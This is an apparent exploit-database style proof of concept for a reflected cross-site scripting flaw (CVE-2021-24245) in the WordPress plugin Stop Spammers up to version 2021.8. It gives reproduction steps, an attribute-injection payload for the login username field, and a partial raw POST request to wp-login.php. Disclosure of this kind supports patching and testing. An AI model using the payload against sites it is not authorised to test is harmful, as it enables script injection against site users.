# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)  
# Date: 04/08/2021  
# Exploit Author: Hosein Vita  
# Vendor Homepage:  
# Software Link:  
# Version: <= 2021.8  
# Tested on: Windows-Ubuntu  
# CVE : CVE-2021-24245  
Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript  
Proof of concepts:  
1-Install "Stop Spammers <= 2021.8" in your wordpress website  
2-For testing remove your IP address from the allowed list  
3-Go to http://<YOUR-WEBSITE>/wp-admin  
4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) "  
#Notice the `ad` keyword must be in your payload!  
5-Press Alt + Shift + X to trigger Xss  
#Tested on Firefox  
Request POC:  
POST /wp-login.php HTTP/1.1  
Host: localhost  
Connection: close  
Content-Length: 161  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: wordpress_test_cookie=WP+Cookie+check;